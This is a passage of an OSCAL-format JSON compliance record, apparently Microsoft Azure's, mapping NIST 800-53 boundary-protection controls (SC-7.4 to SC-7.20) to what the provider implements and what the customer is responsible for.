statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ab0bdd7f-e839-42ca-91d9-aef687b97a00","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.4","statements":[{"uuid":"84befd66-3145-4ede-ab60-22d3db92e1d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-015"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.a","by-components":[{"uuid":"403290be-b8b9-467b-b73f-634b81489cec","export":{"provided":[{"uuid":"cf751a80-1e52-41c8-9489-f884a9ad1917","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-015"}],"description":"Network access to Azure is limited by packet filtering at the network edge, at load balancers, and at the Host OS level. Service teams additionally configure their host firewalls to further limit connectivity, specifying for each listening port whether connections are accepted from external networks or only from role instances within the same cloud service or VNet."}],"responsibilities":[{"uuid":"184ac142-f856-41f8-99a5-cf730ecebae4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-015"}],"description":"The customer is responsible for implementing a managed interface for each external telecommunication service.","provided-uuid":"cf751a80-1e52-41c8-9489-f884a9ad1917"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8ab7079f-011b-4f68-86b8-328ba7000d2f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-016"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.b","by-components":[{"uuid":"0c661f21-c7f4-4970-9242-2bfa13aff1e8","export":{"provided":[{"uuid":"2ca5ddac-5900-47a9-8df7-f7be5256a3ec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-016"}],"description":"The Azure Networking team establishes routing policies and ACLs at the edge to only allow the export of 8075 public blocks to Azure's Border Gateway Protocol (BGP) peers. Edge Access Control Lists (ACLs) are applied inbound from all peering interfaces. The policy explicitly filters non-edge protocols such as SQL, RPC, 445, and 135-139 from entering the network from untrusted sources. Service teams running on top of the fabric customize the routing policies and ACLs necessary for their service. For instance, the Azure Portal needs to be externally accessible, but the JIT Portal does not."}],"responsibilities":[{"uuid":"96438c5b-d973-46f1-9afa-033f98734d40","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-016"}],"description":"The customer is responsible for establishing a traffic flow policy for each managed interface.","provided-uuid":"2ca5ddac-5900-47a9-8df7-f7be5256a3ec"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d2e57006-b7f3-4fcf-b906-1c9145c4f058","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.c","by-components":[{"uuid":"c64d100b-6046-469a-b776-e1a876eb3233","export":{"provided":[{"uuid":"bba01d1e-c703-4f39-b5d2-43b6cd03375e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-017"}],"description":"Azure requires the use of TLS 1.2/1.3 throughout the cloud. A TLS scanner hosted by Unified Remoting Scanning (URSA) is used to determine the status of Azure encryption in transit, specifically the use of TLS 1.2/1.3 or higher."}],"responsibilities":[{"uuid":"b2b5628d-d44f-4674-8a16-b2fe992f23ad","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-017"}],"description":"The customer is responsible for protecting the confidentiality and integrity of the information being transmitted across each interface.","provided-uuid":"bba01d1e-c703-4f39-b5d2-43b6cd03375e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9a9524b6-1378-4ae9-bc7d-6a9f283768b5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.d","by-components":[{"uuid":"0f690c1f-12e5-4ed8-97f1-c1f055393639","export":{"provided":[{"uuid":"5ae46055-081b-4210-aac4-029020122954","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-018"}],"description":"Azure documents exceptions to the traffic flow policy outside the standard, approved baseline via the security review process with a supporting mission/business need and duration of that need. In the event an exception is needed from the traffic flow policy, a security review is documented and reviewed by the C+AI Security team."}],"responsibilities":[{"uuid":"e3253121-fd3b-4dc5-8804-70c2cf0df6c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-018"}],"description":"The customer is responsible for documenting each exception to the traffic flow policy with a supporting mission/business need and duration of that need.","provided-uuid":"5ae46055-081b-4210-aac4-029020122954"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c6543138-2f6d-4e11-8c5f-963f2165046e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.e","by-components":[{"uuid":"e52d264f-306b-4292-b3a9-f4913176f79f","export":{"provided":[{"uuid":"a8bfa6fe-ef74-466f-90e2-90505c8b1fea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-019"}],"description":"Azure reviews each change to the network ACL via the C+AI Security Policy Exception process with a supporting mission/business need and duration of that need. In the event an exception is needed, a security review (SR) is documented and reviewed by the C+AI Security team. All exceptions are reviewed on at least a semiannual basis. The Azure Networking team removes all exceptions that are no longer supported by a business need in Azure. If the Azure Networking team identifies and reviews a policy exception that is no longer needed, they remove that exception. At the infrastructure level, Azure blocks administrative ports on the internet edge of the environment through the Edge ACL baseline. To detect any authorized changes to the established traffic flow polices on the Azure boundary the Azure Security Monitoring (ASM) team automatically scans the internet boundary of the Azure environment every four (4) hours. If a blocked port is opened, a ticket is automatically created in the ticketing system and an alert is created for the Azure Security Response Team to remediate."}],"responsibilities":[{"uuid":"1d6ffc63-69cc-4545-ba5e-242bc2f534a7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-019"}],"description":"The customer is responsible for reviewing exceptions to the traffic flow policy at an organization-defined frequency and removing exceptions that are no longer supported by an explicit mission/business need.","provided-uuid":"a8bfa6fe-ef74-466f-90e2-90505c8b1fea"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f467ad6e-0229-494a-9eb7-547b7a3e1a8e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.f","by-components":[{"uuid":"4c55c1b8-7d41-4933-8232-eb6f608e008e","export":{"provided":[{"uuid":"14a37456-2954-46fe-b701-b91d7641ba8d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-020"}],"description":"As described in the Microsoft Security Program Policy (MSPP) and associated standards, Azure employs a deny-all, permit-by-exception policy for allowing the Azure information system to connect to external information systems. Currently, Azure does not have any connections to external information systems. The only interconnections are with internal Microsoft services. The internal Microsoft services that connect with Azure cloud are CorpNet and Cosmos. CorpNet is the Microsoft corporate network. CorpNet contains services run on Microsoft's corporate network, not dedicated to Azure, such as source code repositories, system document repositories, and change ticketing. Cosmos is a service, not dedicated to Azure, that stores and reports on Azure log data. AAD scrubs logs of customer information before sending logs to Cosmos. Azure does not require ISAs/MOUs for connections internal to Microsoft."}],"responsibilities":[{"uuid":"efb2193e-9e0f-4727-9f14-044282489f68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-020"}],"description":"The customer is responsible for preventing unauthorized exchange of control plane traffic with external networks.","provided-uuid":"14a37456-2954-46fe-b701-b91d7641ba8d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"bda9874b-5ab1-4c5b-8b78-3b8e274e8aef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.g","by-components":[{"uuid":"8a112d1e-20c2-4a6e-ad48-ca1f327c21ed","export":{"provided":[{"uuid":"d0e51606-e8d8-48cd-9c21-bf0e9dcb9044","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-021"}],"description":"The overarching principle for a virtualized solution is to allow only connections and communications that are necessary for that virtualized solution to operate, blocking all other ports, protocols, and connections by default. Azure only allows connections and communication that are necessary to operate the system and only after being explicitly opened. Connections are managed at the system boundary using Azure Networking boundary protection devices. Connections within the boundary are managed using: * IP Filtering * Network Security Group (NSG) ACLs * VFP Filtering (for virtual machines) * Host-based firewalls * Guest firewalls (for virtual machines)"}],"responsibilities":[{"uuid":"e015ba26-60b0-4fea-88ff-b791cf76f466","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-021"}],"description":"The customer is responsible for publishing information to enable remote networks to detect unauthorized control plane traffic from internal networks.","provided-uuid":"d0e51606-e8d8-48cd-9c21-bf0e9dcb9044"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a9677360-34e8-478c-a60e-65e0b63e3929","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.4_smt.h","by-components":[{"uuid":"9e9561b8-3014-4435-b404-9ed63a146dd6","export":{"provided":[{"uuid":"09d9ce58-6046-42b4-84ec-f07a04bdd972","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-022"}],"description":"Azure controls and monitors all inbound and outbound traffic through a limited number of network access points at the boundary and at key points within Azure. Azure leverages the following security mechanisms to limit the number of external network connections: * Load balancing and limiting inbound access to Azure, Azure Management Portal, front-end, and customer VM RDP. Each datacenter contains two groups of Jumpboxes, Debug Servers, and Hop Boxes behind a load balancer to limit the access points for Azure internal traffic, and customer traffic passes through a load balancer as well. Both entry points are monitored and generate audit logs and alerts in near-real time. * Jumpboxes , Debug servers, and Network Hop Boxes control all access to Azure. * Azure services are only accessible to customer users through the Azure provisioning portal and Web Services (REST API) interfaces."}],"responsibilities":[{"uuid":"244aaed7-e32a-4d2e-bc70-b2381bd55953","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-022"}],"description":"The customer is responsible for filtering unauthorized control plane traffic from external networks.","provided-uuid":"09d9ce58-6046-42b4-84ec-f07a04bdd972"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"afaa68bc-fcb0-48be-818b-6a499a253f17","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.5","statements":[{"uuid":"c2995b6a-2567-47a1-b284-ea2c13e845e1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.5_smt","by-components":[{"uuid":"c4273d51-11e7-4b1b-afc7-d7a56dba67a2","export":{"provided":[{"uuid":"6ec790ce-028d-4558-aafb-edf882d0abe9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-023"}],"description":"The overarching principle for a virtualized solution is to allow only connections and communications that are necessary for that virtualized solution to operate, blocking all other ports, protocols, and connections by default. Azure only allows connections and communication that are necessary to operate the system and only after being explicitly opened. Connections are managed at the system boundary using Azure Networking boundary protection devices. Connections within the boundary are managed using:_x000D_ _x000D_ * IP Filtering_x000D_ * Network Security Group (NSG) ACLs_x000D_ * VFP Filtering (for virtual machines)_x000D_ * Host-based firewalls_x000D_ * Guest firewalls (for virtual machines)_x000D_ _x000D_"}],"responsibilities":[{"uuid":"355a3050-b9ec-4e0f-a4db-47bb811d38f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-023"}],"description":"The customer is responsible for configuring managed network interfaces to deny all traffic by default and permit by exception.","provided-uuid":"6ec790ce-028d-4558-aafb-edf882d0abe9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"114b2419-5b56-46be-ae6b-2cd33096842f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.7","statements":[{"uuid":"02bc5ffd-368a-49a4-b7a4-4b02ee6224a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-024"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.7_smt","by-components":[{"uuid":"0ad4ceff-1126-461c-a5d4-083efdb2acfe","export":{"provided":[{"uuid":"6537359b-5ffc-4e53-9472-5c24da22031e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-024"}],"description":"Azure sessions do not permit split tunneling. Azure utilizes an L4 VPN which does not allow split tunneling - this feature only works with L3 VPNs. All connections are made over FIPS 140-2 TLS encrypted connections and authenticated using multifactor authentication (MFA). Azure does not permit remote devices to establish non-remote connections (such as VPNs) with the Azure environment. In order to access the Azure environment, a user must authenticate with their Azure domain credentials either through an Azure Remote Desktop Gateway boundary device via the Microsoft remote desktop connection client (internet accessible) or through a connection (not internet accessible)._x000D_ _x000D_"}],"responsibilities":[{"uuid":"58eb13d8-6a25-4690-b8dc-453ae52439af","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-024"}],"description":"The customer is responsible for preventing split tunneling for remote devices connecting to the customer-deployed system.","provided-uuid":"6537359b-5ffc-4e53-9472-5c24da22031e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"9e03a92c-dd35-4796-b5f7-76609d9c4c7d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.8","statements":[{"uuid":"17f58241-a01a-446f-8887-f22488db1129","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-025"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sc-7.8_smt","by-components":[{"uuid":"7877e378-a5b7-4e6a-a29d-2b961d7e3180","export":{"provided":[{"uuid":"8da74d73-c448-4b26-83d4-4b0c29dd0bde","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-025"}],"description":"This control does not apply to Azure. Proxy servers are not deployed in Azure since Azure does not externally route internal traffic. This control is related to controlling and monitoring client-initiated internet communications (e.g. outbound HTTP proxies). Clients/desktops are not in the scope of Azure and are managed by the customer. These connections to Azure assets are managed by Azure and are controlled by the Azure Networking team._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3a3a3133-f85b-4f0b-b0d8-4e96db529ca4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-025"}],"description":"The customer is responsible for routing customer-defined information through an authenticated proxy to an external network.","provided-uuid":"8da74d73-c448-4b26-83d4-4b0c29dd0bde"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f0feab84-ccde-435b-aca4-e171d5fa0842","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.10","statements":[{"uuid":"e2cf41fa-5124-4685-b189-1adcffec3211","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.10_smt.a","by-components":[{"uuid":"0782ea9d-3b03-4537-a435-6bd4896309e6","export":{"provided":[{"uuid":"e00e4be4-b3e7-4ebc-a003-170e0904aab4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-026"}],"description":"For Azure services, onboarding to Azure Security Pack (AzSecPack) enables monitoring of network communication correlated with network logs and in-memory lateral movement during post exploitation for all deployment types via Process Investigation, which is available externally via Microsoft Defender for Cloud via Fileless Attack detections, and via the Network Risk Management (NRM) Service. The NRM service assesses the resultant set of open ports and protocols based on data provided by the VM agent. Additionally, for VMs hosted on Azure, the Network Security Group (NSG) settings are considered and the resultant set of the settings is calculated. Additionally, for the assets running in Bare Metal, Azure assesses the Surface Area Manager configuration settings. For Linux VMs hosted in Azure, Azure uses the NSG settings to validate that the configuration meets the network baseline requirements. For all deployment types, if there is a network baseline violation that exposes a management port to the internet, an alert is generated and provided to the service team. For internal services, there is monitoring and alerting for unusual behavior of key security features including, but not limited to, if a user accesses an asset without using Azure Just In Time (JIT) access, if a dSTS account has an unusual access pattern, if the Geneva Actions have unusual activity, if the Azure Fabric is accessed without using Azure JIT, or if a service owner has unexpected changes to permissions in the service team subscription. Additionally, service teams regardless of deployment type must monitor their own network connections for unexpected network activities at the application layer. However, to protect customer end user identifiable information, Azure does not monitor the customer traffic in the security monitoring solutions. Azure does not inspect or monitor customer traffic. By default, Microsoft is unaware of what data is outbound from the environment by the customer. In the event of customer data spillage, upon customer request, Microsoft may assist with the incident including accessing customer data according to the Azure Incident Management Standard Operating Procedure (SOP)."}],"responsibilities":[{"uuid":"8ea2241b-34a3-45b8-be73-323570882584","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-026"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for preventing unauthorized exfiltration of information across managed interfaces.","provided-uuid":"e00e4be4-b3e7-4ebc-a003-170e0904aab4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1e80698c-19bf-47a7-a3e2-5a8137cf0068","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-027"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.10_smt.b","by-components":[{"uuid":"96a3d072-d07f-442a-b8f9-cc5f64b0dcb4","export":{"provided":[{"uuid":"e7bb0190-f2b4-4d0f-b1f1-0d72a277f7eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-027"}],"description":"The Third Party Assessment Organization (3PAO) performs penetration testing on the information system at least annually which includes exfiltration testing. The Penetration Test Report covers Azure system components identified as part of the authorization boundary."}],"responsibilities":[{"uuid":"48977d6d-27c6-45ee-ab84-38f6607b04f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-027"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for conducting exfiltration tests at organization-defined frequency.","provided-uuid":"e7bb0190-f2b4-4d0f-b1f1-0d72a277f7eb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"44cbfebc-1b67-4f9e-ae73-a7b776e4c40b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.12","statements":[{"uuid":"28c45eb9-34bb-44af-b12f-ffe31c3d729b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.12_smt","by-components":[{"uuid":"459cea23-9e5c-4d6e-b675-8cbf51046a61","export":{"provided":[{"uuid":"d0814f7f-3fdf-4e65-9909-c4b44bc010b8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-028"}],"description":"Azure implements the following host-based boundary protection mechanisms:_x000D_ _x000D_ * IP Filtering_x000D_ * VFP Filtering (for virtual machines)_x000D_ * Host-based firewalls_x000D_ * Guest firewalls (for virtual machines)_x000D_ _x000D_ Azure uses a combination of detection and fast response via several methods to address the risk of intrusion. This includes the use of event forwarding tools, security incident and event management tools, vulnerability scanning and reporting tools, and centrally managed anti-virus on Azure assets. These tools are forms of host-based protection._x000D_ _x000D_"}],"responsibilities":[{"uuid":"7981da30-8e6d-4c98-bab7-45115c03038c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-028"}],"description":"The customer is responsible for implementing host-based boundary protection at customer-deployed virtual machines running customer-controlled operating systems.","provided-uuid":"d0814f7f-3fdf-4e65-9909-c4b44bc010b8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f304623b-f432-4bfd-af0f-7461579d96e0","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.18","statements":[{"uuid":"c34c2776-d991-4515-aba9-ba9bdd4526e1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.18_smt","by-components":[{"uuid":"cd346ec7-1d38-472f-9144-05c0186692af","export":{"provided":[{"uuid":"e0faa359-5c46-493a-a872-ca7f67017e56","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-029"}],"description":"Azure deploys geographically separate and redundant boundary protection network devices and Jumpboxesand SSL VPN servers. When an asset fails, it fails securely, and access is restricted to the environment. If Azure network devices, including but not limited to edge routers, access routers, load balancers, aggregation switches, and TORS fail, the affected circuit becomes disconnected, thereby failing securely. A failure of an Azure network device cannot lead to, or cause, information external to the system entering the device, nor can a failure permit unauthorized information release. The built-in redundancy allows Azure assets to fail without influencing availability. Many Azure network devices are configured to reboot in the event of failure, rather than remaining offline._x000D_ _x000D_"}],"responsibilities":[{"uuid":"621ff98a-847c-4092-a82b-55ae273e3217","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-029"}],"description":"The customer is responsible for preventing systems from entering unsecure states in the event of an operational failure of a boundary protection device.","provided-uuid":"e0faa359-5c46-493a-a872-ca7f67017e56"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5ed7b38e-02e5-490e-b705-9f17725c35b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"sc-7.20","statements":[{"uuid":"902bfdb1-c32f-48ac-baab-702a2ffda77b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sc-7.20_smt","by-components":[{"uuid":"b9d1d97e-0c71-4519-b8ca-90104d0a26fc","export":{"provided":[{"uuid":"e50ff03c-80b4-4a7d-a476-b0393fb64425","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-030"}],"description":"Azure personnel have the capability to isolate or segregate Azure assets by various means, including but not limited to:_x000D_ _x000D_ * Physical network disconnection_x000D_ * Removal from load balancer rotation_x000D_ * VLAN, NSG, and ACL isolation_x000D_ _x000D_ Any of these actions can be performed in real time by the appropriate service team or Security Response Team as required._x000D_ _x000D_"}],"responsibilities":[{"uuid":"55732e8b-5541-48d2-b554-c281a9a1f9ae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SC-16-030"}],"description":"The customer is responsible for ensuring that the system has the capability to dynamically isolate customer-deployed resources.","provided-uuid":"e50ff03c-80b4-4a7d-a476-b0393fb64425"}]},"description":"See inheritance and customer responsibility 